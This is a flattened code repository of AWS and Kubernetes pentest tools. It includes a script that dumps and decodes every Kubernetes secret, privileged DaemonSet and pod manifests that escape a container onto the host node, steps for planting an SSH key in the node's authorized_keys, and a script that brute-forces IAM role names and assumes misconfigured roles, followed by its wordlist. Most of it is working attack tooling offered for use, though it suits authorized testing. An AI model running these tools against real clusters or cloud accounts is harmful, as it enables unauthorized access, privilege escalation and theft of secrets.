├── .gitignore ├── LICENSE ├── README.md ├── cloudformation └── cf_dumper.py ├── eks ├── all_node_host.yaml ├── k8s_secrets_dumper.py ├── pod_to_node2.yaml └── pod_to_node_escape │ ├── README.md │ └── node-mount.yaml ├── iam ├── assume_role_enum │ ├── assume_role_enum.py │ └── default-word-list.txt └── iam_user_enum │ ├── default-word-list.txt │ └── iam_user_enum.py ├── lambda ├── lambda_backdoor.py └── lambda_dumper.py └── requirements.txt /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | *.egg-info/ 24 | .installed.cfg 25 | *.egg 26 | MANIFEST 27 | 28 | # PyInstaller 29 | # Usually these files are written by a python script from a template 30 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 31 | *.manifest 32 | *.spec 33 | 34 | # Installer logs 35 | pip-log.txt 36 | pip-delete-this-directory.txt 37 | 38 | # Unit test / coverage reports 39 | htmlcov/ 40 | .tox/ 41 | .coverage 42 | .coverage.* 43 | .cache 44 | nosetests.xml 45 | coverage.xml 46 | *.cover 47 | .hypothesis/ 48 | .pytest_cache/ 49 | 50 | # Translations 51 | *.mo 52 | *.pot 53 | 54 | # Django stuff: 55 | *.log 56 | local_settings.py 57 | db.sqlite3 58 | 59 | # Flask stuff: 60 | instance/ 61 | .webassets-cache 62 | 63 | # Scrapy stuff: 64 | .scrapy 65 | 66 | # Sphinx documentation 67 | docs/_build/ 68 | 69 | # PyBuilder 70 | target/ 71 | 72 | # Jupyter Notebook 73 | .ipynb_checkpoints 74 | 75 | # pyenv 76 | .python-version 77 | 78 | # celery beat schedule file 79 | celerybeat-schedule 80 | 81 | # SageMath parsed files 82 | *.sage.py 83 | 84 | # Environments 85 | .env 86 | .venv 87 | env/ 88 | venv/ 89 | ENV/ 90 | env.bak/ 91 | venv.bak/ 92 | 93 | # Spyder project settings 94 | .spyderproject 95 | .spyproject 96 | 97 | # Rope project settings 98 | .ropeproject 99 | 100 | # mkdocs documentation 101 | /site 102 | 103 | # mypy 104 | .mypy_cache/ 105 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License 2 | 3 | Copyright (c) 2018, Ajin Abraham 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | * Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | * Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | * Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # AWS Security tools 2 | Bunch of scripts for AWS Pentest 3 | 4 | * lambda/lambda_dumper.py - Script to Dump AWS Lambda functions 5 | * lambda/lambda_backdoor.py - Backdoor AWS users 6 | * iam/iam_user_enum - Bruteforce IAM usernames 7 | * iam/assume_role_enum - Enumerate and Assume IAM Roles for privilege escalation 8 | * eks/k8s_secrets_dumper.py - Kubernetes Secrets Dumper 9 | * eks/pod_to_node_escape - Escape form k8s pod to underlying container 10 | 11 | # Credits 12 | * Rhino Securiry Labs - iam_user_enum, assume_role_enum 13 | * Daniel Grzelak - lambda_backdoor 14 | * Brad Geesaman - pod_to_node_escape 15 | -------------------------------------------------------------------------------- /cloudformation/cf_dumper.py: -------------------------------------------------------------------------------- 1 | """ 2 | Python 3 3 | Script to dump CloudFormation templates 4 | aws configure 5 | 6 | configure your AWS credentials 7 | you should have permission for listing and downloading CloudFormation stacks 8 | """ 9 | import os 10 | import boto3 11 | import requests 12 | import yaml 13 | import shutil 14 | from cfn_flip import to_json 15 | 16 | 17 | class CFNDumper: 18 | 19 | def __init__(self, out_dir): 20 | self.out_dir = out_dir 21 | self.client = boto3.client('cloudformation') 22 | self.cf_templates = [] 23 | 24 | def get_cfns(self): 25 | res = self.client.list_stacks( 26 | StackStatusFilter=['UPDATE_COMPLETE']) 27 | self.cf_templates = [f["StackName"] for f in res["StackSummaries"]] 28 | 29 | def get_templates(self): 30 | for stack in self.cf_templates: 31 | out = self.client.get_template( 32 | StackName=stack, 33 | TemplateStage='Processed') 34 | yaml_out = out['TemplateBody'] 35 | json_out = to_json(yaml_out) 36 | open(f'./cf_templates/{stack}.yaml', 'w').write(yaml_out) 37 | open(f'./cf_templates/{stack}.json', 'w').write(json_out) 38 | 39 | if __name__ == "__main__": 40 | print("CloudFormationDumper: Script for dumping CloudFormation templates - Ajin Abraham") 41 | out_dir = './cf_templates/' 42 | if not os.path.exists(out_dir): 43 | os.makedirs(out_dir) 44 | else: 45 | shutil.rmtree(out_dir) 46 | os.makedirs(out_dir) 47 | cfnd = CFNDumper(out_dir) 48 | cfnd.get_cfns() 49 | cfnd.get_templates() 50 | print(f'[INFO] Finished Dumping CloudFormation templates to {out_dir}') 51 | -------------------------------------------------------------------------------- /eks/all_node_host.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: DaemonSet 3 | metadata: 4 | name: podtonode 5 | labels: 6 | k8s-app: podtonode 7 | spec: 8 | selector: 9 | matchLabels: 10 | name: podtonode 11 | template: 12 | metadata: 13 | labels: 14 | name: podtonode 15 | spec: 16 | tolerations: 17 | - key: node-role.kubernetes.io/master 18 | effect: NoSchedule 19 | hostNetwork: true 20 | hostPID: true 21 | dnsPolicy: ClusterFirstWithHostNet 22 | containers: 23 | - name: nsenter 24 | image: alexeiled/nsenter:2.34 25 | securityContext: 26 | privileged: true 27 | command: 28 | - "/nsenter" 29 | - "--all" 30 | - "--target=1" 31 | - "--" 32 | - "sh" 33 | - "-c" 34 | args: 35 | - uname -a; id; while true; do sleep 1; done' 36 | resources: 37 | requests: 38 | cpu: 10m 39 | -------------------------------------------------------------------------------- /eks/k8s_secrets_dumper.py: -------------------------------------------------------------------------------- 1 | """ 2 | Python 3 3 | Script to dump Kubernetes Secrets 4 | pip install kubernetes 5 | 6 | Ensure that kubectl is configured to your cluster by running 7 | kubectl config current-context 8 | """ 9 | from base64 import b64decode 10 | from kubernetes import client, config 11 | 12 | 13 | def k8s_secret_dumper(): 14 | config.load_kube_config() 15 | v1 = client.CoreV1Api() 16 | ret = v1.list_secret_for_all_namespaces(watch=False) 17 | for elm in ret.items: 18 | print(f'Name: {elm.metadata.name} in Namespace: {elm.metadata.namespace}') 19 | print("==============================SECRETS============================") 20 | for key, value in elm.data.items(): 21 | print(f'Key: {key}\nDecoded Secret: {b64decode(value).decode()}\n') 22 | print("=================================================================\n") 23 | 24 | if __name__ == "__main__": 25 | print("k8s_secret_dumper: Script for dumping Kubernetes Secrets - Ajin Abraham\n") 26 | k8s_secret_dumper() -------------------------------------------------------------------------------- /eks/pod_to_node2.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: DaemonSet 3 | metadata: 4 | name: pode-to-node 5 | labels: 6 | spec: 7 | selector: 8 | matchLabels: 9 | name: pode-to-node 10 | template: 11 | metadata: 12 | labels: 13 | name: pode-to-node 14 | spec: 15 | tolerations: 16 | - key: node-role.kubernetes.io/master 17 | effect: NoSchedule 18 | hostNetwork: true 19 | hostPID: true 20 | hostIPC: true 21 | containers: 22 | - name: busybox 23 | image: busybox 24 | securityContext: 25 | privileged: true 26 | volumeMounts: 27 | - mountPath: /host 28 | name: host 29 | command: [ "/bin/sh", "-c", "--" ] 30 | args: [ "chroot /host uname -a; 31 | while true; do sleep 1; done" ] 32 | volumes: 33 | - name: host 34 | hostPath: 35 | path: / 36 | -------------------------------------------------------------------------------- /eks/pod_to_node_escape/README.md: -------------------------------------------------------------------------------- 1 | Mount rootfs of EC2 Worker node, Add your SSH Key, SSH directly into EC2 Instance! 2 | 3 | ``` 4 | kubectl create -f node_mount.yaml 5 | kubectl get pod node-mount --namespace kube-system 6 | kubectl exec -it node-mount --namespace kube-system bash 7 | echo \"\" >> rootfs/home/ec2-user/.ssh/authorized_keys 8 | kubectl delete pods node-mount --namespace kube-system 9 | ssh user@ec2_instance_ip 10 | ``` 11 | 12 | -------------------------------------------------------------------------------- /eks/pod_to_node_escape/node-mount.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | name: node-mount 5 | namespace: kube-system 6 | spec: 7 | containers: 8 | - name: node-mount 9 | image: "ubuntu:14.04" 10 | command: [ "/bin/bash", "-c", "--" ] 11 | args: [ "while true; do sleep 30; done;" ] # To Keep Container in running state 12 | securityContext: 13 | privileged: true 14 | volumeMounts: 15 | - name: rootfs 16 | mountPath: /rootfs 17 | restartPolicy: Always 18 | volumes: 19 | - name: rootfs 20 | hostPath: 21 | path: / 22 | nodeSelector: 23 | kubernetes.io/hostname: $NODE_HOSTNAME -------------------------------------------------------------------------------- /iam/assume_role_enum/assume_role_enum.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # assume_role_enum.py by Spencer Gietzen of Rhino Security Labs 4 | # 5 | # https://github.com/RhinoSecurityLabs 6 | # https://github.com/RhinoSecurityLabs/Security-Research/tree/master/tools/aws-pentest-tools/assume_role_enum 7 | 8 | import argparse 9 | import boto3 10 | import botocore 11 | import random 12 | import string 13 | import json 14 | import sys 15 | 16 | def main(args): 17 | attempts = 0 18 | restricted_roles = [] 19 | successful_role_arn = '' 20 | 21 | if args.word_list is None: 22 | word_list_path = './default-word-list.txt' 23 | else: 24 | word_list_path = args.word_list.strip() 25 | 26 | with open(word_list_path, 'r') as f: 27 | word_list = f.read().splitlines() 28 | 29 | if args.profile == None: 30 | session = boto3.session.Session() 31 | print('No AWS CLI profile passed in, choose one below or rerun the script using the -p/--profile argument:') 32 | profiles = session.available_profiles 33 | for i in range(0, len(profiles)): 34 | print('[{}] {}'.format(i, profiles[i])) 35 | profile_number = int(input('Choose a profile (Ctrl+C to exit): ').strip()) 36 | session = boto3.session.Session(profile_name=profiles[profile_number]) 37 | client = session.client('sts') 38 | else: 39 | try: 40 | session = boto3.session.Session(profile_name=args.profile) 41 | except botocore.exceptions.ProfileNotFound as error: 42 | print('Did not find the specified AWS CLI profile: {}\n'.format(args.profile)) 43 | 44 | session = boto3.session.Session() 45 | print('Profiles that are available: {}\n'.format(session.available_profiles)) 46 | print('Quitting...\n') 47 | sys.exit(1) 48 | client = session.client('sts') 49 | 50 | print('Targeting account ID: {}\n'.format(args.account_id)) 51 | print('Starting role enumeration...\n') 52 | 53 | for word in word_list: 54 | role_arn = 'arn:aws:iam::{}:role/{}'.format(args.account_id, word) 55 | 56 | attempts += 1 57 | 58 | try: 59 | response = client.assume_role( 60 | RoleArn=role_arn, 61 | RoleSessionName=''.join(random.choice(string.ascii_lowercase + string.ascii_uppercase + string.digits) for _ in range(20)), 62 | DurationSeconds=43200 63 | ) 64 | 65 | print(' Successfully assumed role for 12 hours: {}\n'.format(role_arn)) 66 | 67 | successful_role_arn = role_arn 68 | response.pop('ResponseMetadata', None) 69 | print(json.dumps(response, indent=2, default=str)) 70 | 71 | break 72 | except botocore.exceptions.ClientError as error: 73 | print (error) 74 | if 'The requested DurationSeconds exceeds the MaxSessionDuration set for this role.' in str(error): 75 | # Found a vulnerable role, but requested more time than the max allowed for it 76 | print(' ** Found vulnerable role: {} **'.format(role_arn)) 77 | print(' Hit max session time limit, reverting to minimum of 1 hour...\n') 78 | 79 | response = client.assume_role( 80 | RoleArn=role_arn, 81 | RoleSessionName=''.join(random.choice(string.ascii_lowercase + string.ascii_uppercase + string.digits) for _ in range(20)), 82 | DurationSeconds=3600 83 | ) 84 | 85 | print(' Successfully assumed role: {}\n'.format(role_arn)) 86 | 87 | successful_role_arn = role_arn 88 | response.pop('ResponseMetadata', None) 89 | print(json.dumps(response, indent=2, default=str)) 90 | 91 | break 92 | elif 'Not authorized to perform sts:AssumeRole' in str(error): 93 | # Role not found 94 | pass 95 | elif 'is not authorized to perform: sts:AssumeRole on resource' in str(error): 96 | # Role found, but not allowed to assume 97 | print(' Found restricted role: {}\n'.format(role_arn)) 98 | restricted_roles.append(role_arn) 99 | 100 | if len(restricted_roles) == 0 and successful_role_arn == '': 101 | print('No roles were found.\n') 102 | elif successful_role_arn == '': 103 | print('No roles that we can assume were found.\n') 104 | if len(restricted_roles) > 0: 105 | print('Found {} restricted role(s):\n'.format(len(restricted_roles))) 106 | for role in restricted_roles: 107 | print(' {}'.format(role)) 108 | 109 | 110 | 111 | print('\n{} completed after {} guess(es).\n'.format(sys.argv[0], attempts)) 112 | return True 113 | 114 | if __name__ == '__main__': 115 | parser = argparse.ArgumentParser(description='This script takes in an AWS account ID and tries to enumerate role names within that account. If one is discovered and it is misconfigured to allow role-assumption from a wide group, it is possible to assume that role and gain access to that AWS account through this method. NOTE: It is recommended to use personal AWS access keys for this script, as it will spam CloudTrail with "AssumeRole" logs. The keys used must have the sts:AssumeRole permission on any resource (*) to be able to identify/assume a misconfigured role. Without the sts:AssumeRole permission, you can still identify existing roles in the target account though.') 116 | 117 | parser.add_argument('-p', '--profile', required=False, default=None, help='The AWS CLI profile to use for making API calls. This is usually stored under ~/.aws/credentials. You will be prompted by default.') 118 | parser.add_argument('-w', '--word-list', required=False, default=None, help='File path to a different word list to use. There is a default word list with 1100+ words. The word list should contain words, one on each line, to use to try and guess IAM role names. Role names ARE case-sensitive.') 119 | parser.add_argument('-i', '--account-id', required=True, help='The AWS account ID of the target account (12 numeric characters).') 120 | 121 | args = parser.parse_args() 122 | 123 | if not len(args.account_id) == 12 or not args.account_id.isdigit(): 124 | print('Error: An AWS account ID is a number of length 12. You supplied: {}\n'.format(args.account_id)) 125 | else: 126 | print('\nWarning: This script does not check if the keys you supplied have the correct permissions. Make sure they are allowed to use sts:AssumeRole on any resource (*)! You can still enumerate roles that exist without the sts:AssumeRole permission, but you cannot assume (or identify) a misconfigured role.\n') 127 | main(args) -------------------------------------------------------------------------------- /iam/assume_role_enum/default-word-list.txt: -------------------------------------------------------------------------------- 1 | 0 2 | 1 3 | 2 4 | 3 5 | 4 6 | 5 7 | 6 8 | 7 9 | 8 10 | 9 11 | A 12 | ADS 13 | API 14 | APIGateway 15 | AWS 16 | Aaron 17 | Abram 18 | Account 19 | Adelia 20 | Adell 21 | Admin 22 | Administrator 23 | Agustin 24 | Ai 25 | Alert_Logic_Cloud_Defender 26 | Alexa 27 | AlexaForBusiness 28 | Alfonzo 29 | Ali 30 | Alica 31 | Alisia 32 | Allan 33 | Almeda 34 | Alpha 35 | Alvera 36 | Amado 37 | AmazonRedShift 38 | Amberly 39 | Amos 40 | Analytics 41 | Anderson 42 | Anette 43 | Angele 44 | Angie 45 | Annalisa 46 | Anne 47 | Annice 48 | Antonetta 49 | Antonia 50 | Antwan 51 | AppStream2 52 | AppStream2.0 53 | AppSync 54 | Argelia 55 | Argentina 56 | Arnoldo 57 | Artifact 58 | Arvilla 59 | Athena 60 | Audit 61 | AutoScaling 62 | Avery 63 | Ayanna 64 | B 65 | Bari 66 | Bastion 67 | Batch 68 | Benton 69 | Bethel 70 | Billing 71 | Bobette 72 | Brandie 73 | Brenton 74 | Bret 75 | Britt 76 | Bruce 77 | Bryan 78 | Bryant 79 | Brynn 80 | Buddy 81 | C 82 | CF 83 | CLI 84 | Caitlin 85 | Caleb 86 | Carlotta 87 | CertificateManager 88 | Chauncey 89 | Cheri 90 | Chery 91 | Chime 92 | Chris 93 | Cicely 94 | Clark 95 | Cloud9 96 | CloudCheckr 97 | CloudFormation 98 | CloudFront 99 | CloudHSM 100 | CloudMGR 101 | CloudSearch 102 | CloudSploitRole 103 | CloudTrail 104 | CloudWatch 105 | CodeBuild 106 | CodeCommit 107 | CodeDeploy 108 | CodePipeline 109 | CodeStar 110 | Cognito 111 | Coleman 112 | Comprehend 113 | Config 114 | Configuration 115 | Connect 116 | Cordell 117 | Coretta 118 | Corrine 119 | Curt 120 | Curtis 121 | D 122 | DB 123 | DBAdmin 124 | DMS 125 | DS 126 | DSWebAppsScanningRole 127 | Dane 128 | Darnell 129 | Darrel 130 | Darrin 131 | DataPipeline 132 | DataScientist 133 | DatabaseAdministrator 134 | DatadogAWSIntegrationRole 135 | Db 136 | Debrah 137 | DeepLens 138 | Deetta 139 | Default 140 | Delores 141 | Deloris 142 | Demarcus 143 | Demo 144 | Dena 145 | Denice 146 | Denita 147 | Dennis 148 | Derick 149 | Desirae 150 | Dev 151 | Developer 152 | DeviceFarm 153 | Dewey 154 | Dick 155 | Dino 156 | DirectConnect 157 | DirectoryService 158 | Dirk 159 | Docker 160 | Dome9-Connect 161 | Dome9Connect 162 | Domenic 163 | Dominique 164 | Donn 165 | Dyan 166 | DynamoDB 167 | E 168 | EBS 169 | EC2 170 | ECS 171 | EFS 172 | EKS 173 | EMR 174 | EMR-Test 175 | EMR-test 176 | EMR_Test 177 | EMR_test 178 | Eboni 179 | Echo 180 | Eddie 181 | ElastiCache 182 | ElasticTranscoder 183 | ElasticsearchService 184 | Elia 185 | Elisabeth 186 | Elsy 187 | Emelda 188 | Emely 189 | Encryption 190 | Erick 191 | Ervin 192 | Ester 193 | Eugenia 194 | Eugenie 195 | External 196 | F 197 | Fabian 198 | Fallon 199 | Faye 200 | Felton 201 | Fernando 202 | Fidel 203 | Floyd 204 | Frankie 205 | FreeRTOS 206 | G 207 | Gala 208 | GameLift 209 | Gene 210 | Georgie 211 | Gertha 212 | Gertie 213 | Gia 214 | Giuseppe 215 | Glacier 216 | Global 217 | GlobalLog 218 | Glue 219 | Graham 220 | Greengrass 221 | Gregg 222 | GuardDuty 223 | H 224 | Hacker 225 | Haywood 226 | Hedwig 227 | Hilario 228 | Hilda 229 | Hoyt 230 | I 231 | IAM 232 | IT 233 | Ian 234 | Ina 235 | Inspector 236 | Intern 237 | IoT1-Click 238 | IoT1Click 239 | IoTAnalytics 240 | IoTCore 241 | IoTDeviceDefender 242 | IoTDeviceManagement 243 | J 244 | Jacinto 245 | Jackson 246 | Jacque 247 | Jade 248 | Jammie 249 | Janita 250 | Jc 251 | Jeanetta 252 | Jenine 253 | Jeremiah 254 | Jewel 255 | Joan 256 | Joanie 257 | Jodie 258 | Joesph 259 | Josue 260 | Judson 261 | Julee 262 | Juliette 263 | K 264 | K8s 265 | KVS 266 | Kaci 267 | Karine 268 | Katy 269 | Keith 270 | Kenna 271 | Kermit 272 | Kiana 273 | Kimiko 274 | Kinesis 275 | KinesisVideoStreams 276 | Kirby 277 | KochavaReadS3 278 | Kops 279 | Korey 280 | Kristian 281 | Kube 282 | KubernetesNode 283 | L 284 | Lacey 285 | Lady 286 | Lakiesha 287 | Lambda 288 | Lang 289 | Lanny 290 | Lashandra 291 | Lauren 292 | Leatrice 293 | Lenard 294 | Leona 295 | Les 296 | Lex 297 | Lightsail 298 | Lillian 299 | Linh 300 | Linnie 301 | Logger 302 | Logging 303 | Loggly_aws 304 | Logs 305 | Loni 306 | Lucie 307 | Lucius 308 | Luke 309 | M 310 | ML 311 | MQ 312 | MachineLearning 313 | Macie 314 | Madeline 315 | Malisa 316 | Marcell 317 | Marcos 318 | Margery 319 | Margrett 320 | Maria 321 | Maribel 322 | Marin 323 | Marlon 324 | Marshall 325 | Maryanna 326 | Marylou 327 | Master 328 | Mathilda 329 | Matthew 330 | Mauricio 331 | Mauro 332 | Maximo 333 | MediaConvert 334 | MediaLive 335 | MediaPackage 336 | MediaStore 337 | MediaTailor 338 | Mee 339 | Melania 340 | Melany 341 | Melody 342 | Meridith 343 | Mesos 344 | Michale 345 | Micheal 346 | Michell 347 | Mickie 348 | MigrationHub 349 | Mikel 350 | Milford 351 | Miquel 352 | Mirna 353 | Misc 354 | Miscellaneous 355 | MobileAnalytics 356 | MobileHub 357 | Mohamed 358 | Molly 359 | Monitor 360 | Monitoring 361 | Monroe 362 | MtSecurityScan 363 | MyRole 364 | N 365 | Natacha 366 | Neida 367 | Neil 368 | Neptune 369 | NetAdmin 370 | NetAdministrator 371 | NetworkAdmin 372 | NetworkAdministrator 373 | Nevada 374 | NewRelic-Infrastructure-AWS-Integration 375 | Ngoc 376 | Nobuko 377 | Norris 378 | Numbers 379 | Nyla 380 | O 381 | Odis 382 | OktaSSO 383 | Onie 384 | OpsClarity-Access 385 | OpsWorks 386 | Orbitera 387 | Orville 388 | P 389 | Palmer 390 | Parker 391 | PenTest 392 | PenetrationTest 393 | PenetrationTester 394 | Pentest 395 | Percy 396 | Phil 397 | Pierre 398 | Pinpoint 399 | Polly 400 | Porsche 401 | Porsha 402 | PowerUser 403 | Poweruser 404 | Pusher 405 | Q 406 | QuickSight 407 | R 408 | RDS 409 | Raeann 410 | Ramona 411 | Rancher 412 | Randal 413 | Randy 414 | ReadOnly 415 | Readonly 416 | RedShift 417 | RedlineAccess 418 | Reggie 419 | Regina 420 | Reina 421 | Rekognition 422 | Renee 423 | Reta 424 | Rhona 425 | Richard 426 | Rickey 427 | Rico 428 | Rigoberto 429 | Robbie 430 | Robbin 431 | Rocky 432 | Roger 433 | Role 434 | Root 435 | RootRole 436 | Rosalind 437 | Rosio 438 | Route53 439 | Royce 440 | Ruben 441 | Rueben 442 | S 443 | S3 444 | SES 445 | SMS 446 | SNS 447 | SQS 448 | SSO 449 | SWF 450 | SageMaker 451 | Salvador 452 | Sammy 453 | Scarlett 454 | Scheduler 455 | SecAudit 456 | SecretsManager 457 | SecurityAudit 458 | See 459 | Server 460 | Service 461 | Seth 462 | Shakira 463 | Shannon 464 | Shaquana 465 | Shara 466 | Shared 467 | Shelia 468 | Shelley 469 | Sherryl 470 | Shield 471 | Shon 472 | Sidney 473 | Silas 474 | SimpleEmailService 475 | SingleSign-On 476 | SingleSignOn 477 | Snowball 478 | Son 479 | Song 480 | Soraya 481 | Spark 482 | Stackdriver 483 | StepFunctions 484 | Storage 485 | StorageGateway 486 | Sumerian 487 | Support 488 | Sylvester 489 | Synthia 490 | Syreeta 491 | SysAdmin 492 | SysAdministrator 493 | SystemAdmin 494 | SystemAdministrator 495 | SystemsManager 496 | T 497 | Tanja 498 | Task 499 | TaskScheduler 500 | Temp 501 | Temporary 502 | Teodoro 503 | Terrilyn 504 | Test 505 | Testing 506 | Thomasine 507 | ThreatStackRole 508 | Tia 509 | Tiana 510 | Timer 511 | Tommie 512 | Tonisha 513 | Tory 514 | Transcribe 515 | Translate 516 | Tresa 517 | Trinidad 518 | Truman 519 | TrustedAdvisor 520 | Tyisha 521 | U 522 | Ulysses 523 | Uploader 524 | Ursula 525 | User 526 | V 527 | VPC 528 | VPC_NAT 529 | VPN 530 | Valentine 531 | Verona 532 | W 533 | WAF 534 | Walter 535 | Waltraud 536 | Waylon 537 | Werner 538 | Wilma 539 | Wilmer 540 | WorkDocs 541 | WorkMail 542 | WorkSpaces 543 | X 544 | X-Ray 545 | XRay 546 | Y 547 | Yahaira 548 | Yer 549 | Yolanda 550 | Z 551 | Zandra 552 | a 553 | aaron 554 | abram 555 | account 556 | adelia 557 | adell 558 | adm 559 | admin 560 | administrator 561 | ads 562 | agustin 563 | ai 564 | alert_logic_cloud_defender 565 | alertlogic 566 | alexa 567 | alexaforbusiness 568 | alfonzo 569 | ali 570 | alica 571 | alisia 572 | allan 573 | almeda 574 | alpha 575 | alvera 576 | amado 577 | amazonredshift 578 | amberly 579 | amos 580 | analytics 581 | anderson 582 | anette 583 | angele 584 | angie 585 | annalisa 586 | anne 587 | annice 588 | antonetta 589 | antonia 590 | antwan 591 | api 592 | apigateway 593 | appstream2 594 | appstream2.0 595 | appsync 596 | argelia 597 | argentina 598 | arnoldo 599 | artifact 600 | arvilla 601 | athena 602 | audit 603 | autoscaling 604 | avery 605 | aws 606 | ayanna 607 | b 608 | bari 609 | bastion 610 | batch 611 | benton 612 | bethel 613 | billing 614 | bobette 615 | bp-cloudhealth 616 | brandie 617 | brenton 618 | bret 619 | britt 620 | bruce 621 | bryan 622 | bryant 623 | brynn 624 | buddy 625 | bulletproof 626 | c 627 | caitlin 628 | caleb 629 | carlotta 630 | cb-access 631 | certificatemanager 632 | cf 633 | chauncey 634 | cheri 635 | chery 636 | chime 637 | chris 638 | cicely 639 | clark 640 | cli 641 | cloud9 642 | cloudability 643 | cloudbreak 644 | cloudcheckr 645 | cloudcraft 646 | cloudformation 647 | cloudfront 648 | cloudhsm 649 | cloudmgr 650 | cloudsearch 651 | cloudsploit 652 | cloudsploitrole 653 | cloudtrail 654 | cloudwatch 655 | codebuild 656 | codecommit 657 | codedeploy 658 | codepipeline 659 | codestar 660 | cognito 661 | coleman 662 | comprehend 663 | config 664 | configuration 665 | connect 666 | cordell 667 | coretta 668 | corrine 669 | curt 670 | curtis 671 | d 672 | dane 673 | darnell 674 | darrel 675 | darrin 676 | databaseadministrator 677 | datadog 678 | datadogawsintegrationrole 679 | datapipeline 680 | datascientist 681 | db 682 | dbadmin 683 | debrah 684 | deeplens 685 | deepsecurity 686 | deetta 687 | default 688 | delores 689 | deloris 690 | demarcus 691 | demo 692 | dena 693 | denice 694 | denita 695 | dennis 696 | derick 697 | desirae 698 | dev 699 | developer 700 | devicefarm 701 | dewey 702 | dick 703 | dino 704 | directconnect 705 | directoryservice 706 | dirk 707 | dms 708 | docker 709 | dome9 710 | dome9-connect 711 | dome9connect 712 | domenic 713 | dominique 714 | donn 715 | ds 716 | dswebappsscanningrole 717 | dyan 718 | dynamodb 719 | dynatrace 720 | e 721 | eboni 722 | ebs 723 | ec2 724 | echo 725 | ecs 726 | eddie 727 | efs 728 | eks 729 | elasticache 730 | elasticsearchservice 731 | elastictranscoder 732 | elia 733 | elisabeth 734 | elsy 735 | emelda 736 | emely 737 | emr 738 | emr-test 739 | emr_test 740 | encryption 741 | erick 742 | ervin 743 | ester 744 | eugenia 745 | eugenie 746 | external 747 | f 748 | fabian 749 | fallon 750 | faye 751 | felton 752 | fernando 753 | fidel 754 | flowlogsRole 755 | flowlogsrole 756 | floyd 757 | frankie 758 | freertos 759 | freshservice 760 | g 761 | gala 762 | gamelift 763 | gene 764 | georgie 765 | gertha 766 | gertie 767 | gia 768 | giuseppe 769 | glacier 770 | global 771 | globallog 772 | globus 773 | glue 774 | graham 775 | greengrass 776 | gregg 777 | guardduty 778 | h 779 | hacker 780 | haywood 781 | hedwig 782 | hilario 783 | hilda 784 | hoyt 785 | i 786 | iam 787 | ian 788 | ina 789 | inspector 790 | instaclustr 791 | intern 792 | iot1-click 793 | iot1click 794 | iotanalytics 795 | iotcore 796 | iotdevicedefender 797 | iotdevicemanagement 798 | it 799 | j 800 | jacinto 801 | jackson 802 | jacque 803 | jade 804 | jammie 805 | janita 806 | jc 807 | jeanetta 808 | jenine 809 | jeremiah 810 | jewel 811 | joan 812 | joanie 813 | jodie 814 | joesph 815 | josue 816 | judson 817 | julee 818 | juliette 819 | k 820 | k8s 821 | kaci 822 | karine 823 | katy 824 | keith 825 | kenna 826 | kermit 827 | keyWatch 828 | keywatch 829 | kiana 830 | kimiko 831 | kinesis 832 | kinesisvideostreams 833 | kirby 834 | kochava 835 | kochavareads3 836 | kops 837 | korey 838 | kristian 839 | kube 840 | kubernetes 841 | kubernetesnode 842 | kvs 843 | l 844 | lacey 845 | lady 846 | lakiesha 847 | lambda 848 | lang 849 | lanny 850 | lashandra 851 | lauren 852 | leatrice 853 | lenard 854 | leona 855 | les 856 | lex 857 | lightsail 858 | lillian 859 | linh 860 | linnie 861 | logger 862 | logging 863 | loggly 864 | loggly-role 865 | loggly_aws 866 | logs 867 | loni 868 | lucie 869 | lucius 870 | luke 871 | m 872 | machinelearning 873 | macie 874 | madeline 875 | malisa 876 | manage 877 | management 878 | management-admin 879 | marcell 880 | marcos 881 | margery 882 | margrett 883 | maria 884 | maribel 885 | marin 886 | marlon 887 | marshall 888 | maryanna 889 | marylou 890 | master 891 | mathilda 892 | matthew 893 | mauricio 894 | mauro 895 | maximo 896 | mediaconvert 897 | medialive 898 | mediapackage 899 | mediastore 900 | mediatailor 901 | mediatemple 902 | mee 903 | melania 904 | melany 905 | melody 906 | meridith 907 | mesos 908 | michale 909 | micheal 910 | michell 911 | mickie 912 | migrationhub 913 | mikel 914 | milford 915 | miquel 916 | mirna 917 | misc 918 | miscellaneous 919 | ml 920 | mobileanalytics 921 | mobilehub 922 | mohamed 923 | molly 924 | 